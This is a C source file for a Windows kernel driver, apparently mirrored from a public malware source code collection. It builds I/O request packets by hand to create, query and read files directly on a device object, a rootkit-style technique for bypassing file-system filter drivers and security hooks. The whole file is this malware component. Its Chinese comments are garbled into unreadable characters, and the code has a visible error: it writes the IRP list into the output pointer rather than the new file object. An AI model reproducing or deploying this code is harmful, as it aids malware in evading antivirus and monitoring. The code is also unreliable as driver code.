mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-21 02:46:10 +00:00
307 lines
8.6 KiB
C
307 lines
8.6 KiB
C
|
#include "FileSystem.h"
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
/*<2A><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>൱<EFBFBD><E0B5B1><EFBFBD>Լ<EFBFBD>ʵ<EFBFBD><CAB5><EFBFBD><EFBFBD>IoCreateFile FileObject<63>е<EFBFBD>IrpListѭ<74><D1AD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>*/
|
|||
|
NTSTATUS
|
|||
|
IrpCreateFile(
|
|||
|
IN PUNICODE_STRING FilePath,
|
|||
|
IN ACCESS_MASK DesiredAccess,
|
|||
|
IN ULONG FileAttributes,
|
|||
|
IN ULONG ShareAccess,
|
|||
|
IN ULONG CreateDisposition,
|
|||
|
IN ULONG CreateOptions,
|
|||
|
IN PDEVICE_OBJECT DeviceObject,
|
|||
|
IN PDEVICE_OBJECT RealDevice,
|
|||
|
OUT PFILE_OBJECT *FileObject
|
|||
|
)
|
|||
|
{
|
|||
|
NTSTATUS ntStatus;
|
|||
|
|
|||
|
HANDLE hFile;
|
|||
|
PFILE_OBJECT _FileObject;
|
|||
|
UNICODE_STRING UniDeviceNameString;
|
|||
|
OBJECT_ATTRIBUTES ObjectAttributes;
|
|||
|
IO_STATUS_BLOCK IoStatusBlock;
|
|||
|
WCHAR *FileNameBuffer=NULL;
|
|||
|
WORD FileObjectSize;
|
|||
|
|
|||
|
|
|||
|
PIRP Irp;
|
|||
|
KEVENT kEvent;
|
|||
|
PIO_STACK_LOCATION IrpSp;
|
|||
|
ACCESS_STATE AccessState;
|
|||
|
AUX_ACCESS_DATA AuxData;
|
|||
|
IO_SECURITY_CONTEXT SecurityContext;
|
|||
|
|
|||
|
PLIST_ENTRY IrpList;
|
|||
|
|
|||
|
InitializeObjectAttributes(&ObjectAttributes, NULL, OBJ_CASE_INSENSITIVE, 0, NULL);
|
|||
|
|
|||
|
//in win7 x86
|
|||
|
FileObjectSize=0x80;
|
|||
|
|
|||
|
|
|||
|
//<2F><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
ntStatus = ObCreateObject(KernelMode,
|
|||
|
*IoFileObjectType,
|
|||
|
&ObjectAttributes,
|
|||
|
KernelMode,
|
|||
|
NULL,
|
|||
|
FileObjectSize,
|
|||
|
0,
|
|||
|
0,
|
|||
|
&_FileObject);
|
|||
|
|
|||
|
if(!NT_SUCCESS(ntStatus))
|
|||
|
{
|
|||
|
return ntStatus;
|
|||
|
}
|
|||
|
|
|||
|
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE); //<2F><>Irp<72><70>ջ<EFBFBD><D5BB><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڴ<EFBFBD><DAB4>ռ<EFBFBD> <20><>СΪ֮ǰ<D6AE><C7B0>ѯ<EFBFBD><D1AF>DeviceObject->Size
|
|||
|
if(Irp == NULL)
|
|||
|
{
|
|||
|
ObDereferenceObject(_FileObject);
|
|||
|
return STATUS_INSUFFICIENT_RESOURCES;
|
|||
|
}
|
|||
|
|
|||
|
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
|
|||
|
|
|||
|
RtlZeroMemory(_FileObject, FileObjectSize);
|
|||
|
_FileObject->Type = IO_TYPE_FILE; //<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
_FileObject->Size = FileObjectSize; //<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С
|
|||
|
_FileObject->DeviceObject = RealDevice; //<2F><>ѯ<EFBFBD><D1AF><EFBFBD>ľ<EFBFBD><C4BE>豸
|
|||
|
_FileObject->Flags = FO_SYNCHRONOUS_IO;
|
|||
|
FileNameBuffer=ExAllocatePool(NonPagedPool,FilePath->MaximumLength);
|
|||
|
if (FileNameBuffer==NULL)
|
|||
|
{
|
|||
|
ObDereferenceObject(_FileObject);
|
|||
|
return STATUS_INSUFFICIENT_RESOURCES;
|
|||
|
}
|
|||
|
RtlCopyMemory(FileNameBuffer,FilePath->Buffer,FilePath->Length);//<2F>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD><EFBFBD><EFBFBD>е<EFBFBD><D0B5>ļ<EFBFBD>·<EFBFBD><C2B7>
|
|||
|
_FileObject->FileName.Buffer=FileNameBuffer; //
|
|||
|
_FileObject->FileName.Length=FilePath->Length;
|
|||
|
_FileObject->FileName.MaximumLength=FilePath->MaximumLength;
|
|||
|
|
|||
|
|
|||
|
IrpList=(PLIST_ENTRY)((DWORD)FileObject+0x74); //IrpList ѭ<><D1AD>ָ<EFBFBD><D6B8><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
IrpList->Flink=IrpList;
|
|||
|
IrpList->Blink=IrpList;
|
|||
|
|
|||
|
KeInitializeEvent(&_FileObject->Lock, SynchronizationEvent, FALSE);
|
|||
|
KeInitializeEvent(&_FileObject->Event, NotificationEvent, FALSE);
|
|||
|
|
|||
|
RtlZeroMemory(&AuxData, sizeof(AUX_ACCESS_DATA));
|
|||
|
ntStatus = SeCreateAccessState( &AccessState, //<2F><><EFBFBD><EFBFBD>Ȩ<EFBFBD><C8A8>
|
|||
|
&AuxData,
|
|||
|
DesiredAccess,
|
|||
|
IoGetFileObjectGenericMapping());
|
|||
|
|
|||
|
if (!NT_SUCCESS(ntStatus))
|
|||
|
{
|
|||
|
IoFreeIrp(Irp);
|
|||
|
ObDereferenceObject(_FileObject);
|
|||
|
ExFreePool(FileNameBuffer);
|
|||
|
return ntStatus;
|
|||
|
}
|
|||
|
|
|||
|
SecurityContext.SecurityQos = NULL;
|
|||
|
SecurityContext.AccessState = &AccessState;
|
|||
|
SecurityContext.DesiredAccess = DesiredAccess;
|
|||
|
SecurityContext.FullCreateOptions = 0;
|
|||
|
|
|||
|
Irp->MdlAddress = NULL;
|
|||
|
Irp->AssociatedIrp.SystemBuffer = NULL;
|
|||
|
Irp->Flags = IRP_CREATE_OPERATION|IRP_SYNCHRONOUS_API;
|
|||
|
Irp->RequestorMode = KernelMode;
|
|||
|
Irp->UserIosb = &IoStatusBlock;
|
|||
|
Irp->UserEvent = &kEvent;
|
|||
|
Irp->PendingReturned = FALSE;
|
|||
|
Irp->Cancel = FALSE;
|
|||
|
Irp->CancelRoutine = NULL;
|
|||
|
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
|
|||
|
Irp->Tail.Overlay.AuxiliaryBuffer = NULL;
|
|||
|
Irp->Tail.Overlay.OriginalFileObject = _FileObject;
|
|||
|
|
|||
|
IrpSp = IoGetNextIrpStackLocation(Irp);
|
|||
|
IrpSp->MajorFunction = IRP_MJ_CREATE;
|
|||
|
IrpSp->DeviceObject = DeviceObject;
|
|||
|
IrpSp->FileObject = _FileObject;
|
|||
|
IrpSp->Parameters.Create.SecurityContext = &SecurityContext;
|
|||
|
IrpSp->Parameters.Create.Options = (CreateDisposition << 24) | CreateOptions;
|
|||
|
IrpSp->Parameters.Create.FileAttributes = (USHORT)FileAttributes;
|
|||
|
IrpSp->Parameters.Create.ShareAccess = (USHORT)ShareAccess;
|
|||
|
IrpSp->Parameters.Create.EaLength = 0;
|
|||
|
|
|||
|
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
|
|||
|
ntStatus = IoCallDriver(DeviceObject, Irp);
|
|||
|
if(ntStatus == STATUS_PENDING)
|
|||
|
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
|
|||
|
|
|||
|
ntStatus = IoStatusBlock.Status;
|
|||
|
|
|||
|
if(!NT_SUCCESS(ntStatus))
|
|||
|
{
|
|||
|
_FileObject->DeviceObject = NULL;
|
|||
|
ObDereferenceObject(_FileObject);
|
|||
|
|
|||
|
}
|
|||
|
else
|
|||
|
{//<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ü<EFBFBD><C3BC><EFBFBD>
|
|||
|
InterlockedIncrement(&_FileObject->DeviceObject->ReferenceCount);
|
|||
|
if (_FileObject->Vpb)
|
|||
|
InterlockedIncrement(&_FileObject->Vpb->ReferenceCount);
|
|||
|
*FileObject = _FileObject;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
return ntStatus;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
NTSTATUS
|
|||
|
IoCompletionRoutine(
|
|||
|
IN PDEVICE_OBJECT DeviceObject,
|
|||
|
IN PIRP Irp,
|
|||
|
IN PVOID Context)
|
|||
|
{
|
|||
|
*Irp->UserIosb = Irp->IoStatus;
|
|||
|
if (Irp->UserEvent)
|
|||
|
KeSetEvent(Irp->UserEvent, IO_NO_INCREMENT, 0);
|
|||
|
if (Irp->MdlAddress)
|
|||
|
{
|
|||
|
IoFreeMdl(Irp->MdlAddress);
|
|||
|
Irp->MdlAddress = NULL;
|
|||
|
}
|
|||
|
IoFreeIrp(Irp);
|
|||
|
return STATUS_MORE_PROCESSING_REQUIRED;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
//<2F><>ѯirp<72><70>ջ<EFBFBD><D5BB>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD>FileObject
|
|||
|
NTSTATUS
|
|||
|
IrpQueryInformationFile(
|
|||
|
IN PFILE_OBJECT FileObject,
|
|||
|
IN PDEVICE_OBJECT DeviceObject,
|
|||
|
OUT PVOID FileInformation,
|
|||
|
IN ULONG Length,
|
|||
|
IN FILE_INFORMATION_CLASS FileInformationClass)
|
|||
|
{
|
|||
|
NTSTATUS ntStatus;
|
|||
|
PIRP Irp;
|
|||
|
KEVENT kEvent;
|
|||
|
PIO_STACK_LOCATION IrpSp;
|
|||
|
IO_STATUS_BLOCK IoStatusBlock;
|
|||
|
|
|||
|
// if (FileObject->Vpb == 0 || FileObject->Vpb->DeviceObject == NULL)
|
|||
|
// return STATUS_UNSUCCESSFUL;
|
|||
|
|
|||
|
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
|
|||
|
if(Irp == NULL)
|
|||
|
return STATUS_INSUFFICIENT_RESOURCES;
|
|||
|
|
|||
|
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
|
|||
|
|
|||
|
RtlZeroMemory(FileInformation, Length);
|
|||
|
Irp->AssociatedIrp.SystemBuffer = FileInformation;
|
|||
|
Irp->UserEvent = &kEvent;
|
|||
|
Irp->UserIosb = &IoStatusBlock;
|
|||
|
Irp->RequestorMode = KernelMode;
|
|||
|
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
|
|||
|
Irp->Tail.Overlay.OriginalFileObject = FileObject;
|
|||
|
|
|||
|
IrpSp = IoGetNextIrpStackLocation(Irp);
|
|||
|
IrpSp->MajorFunction = IRP_MJ_QUERY_INFORMATION;
|
|||
|
IrpSp->DeviceObject = DeviceObject;
|
|||
|
IrpSp->FileObject = FileObject;
|
|||
|
IrpSp->Parameters.QueryFile.Length = Length;
|
|||
|
IrpSp->Parameters.QueryFile.FileInformationClass = FileInformationClass;
|
|||
|
|
|||
|
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
|
|||
|
ntStatus = IoCallDriver(DeviceObject, Irp);
|
|||
|
|
|||
|
if (ntStatus == STATUS_PENDING)
|
|||
|
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
|
|||
|
|
|||
|
return IoStatusBlock.Status;
|
|||
|
}
|
|||
|
|
|||
|
|
|||
|
|
|||
|
//Irp<72><70><EFBFBD><EFBFBD><F3A3ACBD>ļ<EFBFBD><C4BC><EFBFBD><EFBFBD>뻺<EFBFBD><EBBBBA><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
NTSTATUS
|
|||
|
IrpReadFile(
|
|||
|
IN PFILE_OBJECT FileObject,
|
|||
|
IN PDEVICE_OBJECT DeviceObject,
|
|||
|
OUT PIO_STATUS_BLOCK IoStatusBlock,
|
|||
|
OUT PVOID Buffer,
|
|||
|
IN ULONG Length,
|
|||
|
IN PLARGE_INTEGER ByteOffset OPTIONAL)
|
|||
|
{
|
|||
|
NTSTATUS ntStatus;
|
|||
|
PIRP Irp;
|
|||
|
KEVENT kEvent;
|
|||
|
PIO_STACK_LOCATION IrpSp;
|
|||
|
//
|
|||
|
|
|||
|
|
|||
|
if(ByteOffset == NULL)
|
|||
|
{
|
|||
|
if(!(FileObject->Flags & FO_SYNCHRONOUS_IO))
|
|||
|
return STATUS_INVALID_PARAMETER;
|
|||
|
ByteOffset = &FileObject->CurrentByteOffset;
|
|||
|
}
|
|||
|
|
|||
|
Irp = IoAllocateIrp(DeviceObject->StackSize, FALSE);
|
|||
|
if(Irp == NULL) return STATUS_INSUFFICIENT_RESOURCES;
|
|||
|
|
|||
|
RtlZeroMemory(Buffer, Length);
|
|||
|
if(FileObject->DeviceObject->Flags & DO_BUFFERED_IO) //<2F><><EFBFBD>巽ʽ
|
|||
|
{
|
|||
|
Irp->AssociatedIrp.SystemBuffer = Buffer;
|
|||
|
}
|
|||
|
else if(FileObject->DeviceObject->Flags & DO_DIRECT_IO) //ֱ<>ӷ<EFBFBD>ʽ
|
|||
|
{
|
|||
|
Irp->MdlAddress = IoAllocateMdl(Buffer, Length, 0, 0, 0);
|
|||
|
if (Irp->MdlAddress == NULL)
|
|||
|
{
|
|||
|
IoFreeIrp(Irp);
|
|||
|
return STATUS_INSUFFICIENT_RESOURCES;
|
|||
|
}
|
|||
|
MmBuildMdlForNonPagedPool(Irp->MdlAddress);
|
|||
|
}
|
|||
|
else //<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʽ
|
|||
|
{
|
|||
|
Irp->UserBuffer = Buffer;
|
|||
|
}
|
|||
|
|
|||
|
KeInitializeEvent(&kEvent, SynchronizationEvent, FALSE);
|
|||
|
|
|||
|
Irp->UserEvent = &kEvent;
|
|||
|
Irp->UserIosb = IoStatusBlock;
|
|||
|
Irp->RequestorMode = KernelMode;
|
|||
|
Irp->Flags = IRP_READ_OPERATION;
|
|||
|
Irp->Tail.Overlay.Thread = PsGetCurrentThread();
|
|||
|
Irp->Tail.Overlay.OriginalFileObject = FileObject;
|
|||
|
|
|||
|
IrpSp = IoGetNextIrpStackLocation(Irp);
|
|||
|
IrpSp->MajorFunction = IRP_MJ_READ;
|
|||
|
IrpSp->MinorFunction = IRP_MN_NORMAL;
|
|||
|
IrpSp->DeviceObject = DeviceObject;
|
|||
|
IrpSp->FileObject = FileObject;
|
|||
|
IrpSp->Parameters.Read.Length = Length;
|
|||
|
IrpSp->Parameters.Read.ByteOffset = *ByteOffset;
|
|||
|
|
|||
|
IoSetCompletionRoutine(Irp, IoCompletionRoutine, 0, TRUE, TRUE, TRUE);
|
|||
|
ntStatus = IoCallDriver(DeviceObject, Irp);
|
|||
|
if (ntStatus == STATUS_PENDING)
|
|||
|
KeWaitForSingleObject(&kEvent, Executive, KernelMode, TRUE, 0);
|
|||
|
|
|||
|
return IoStatusBlock->Status;
|
|||
|
}
|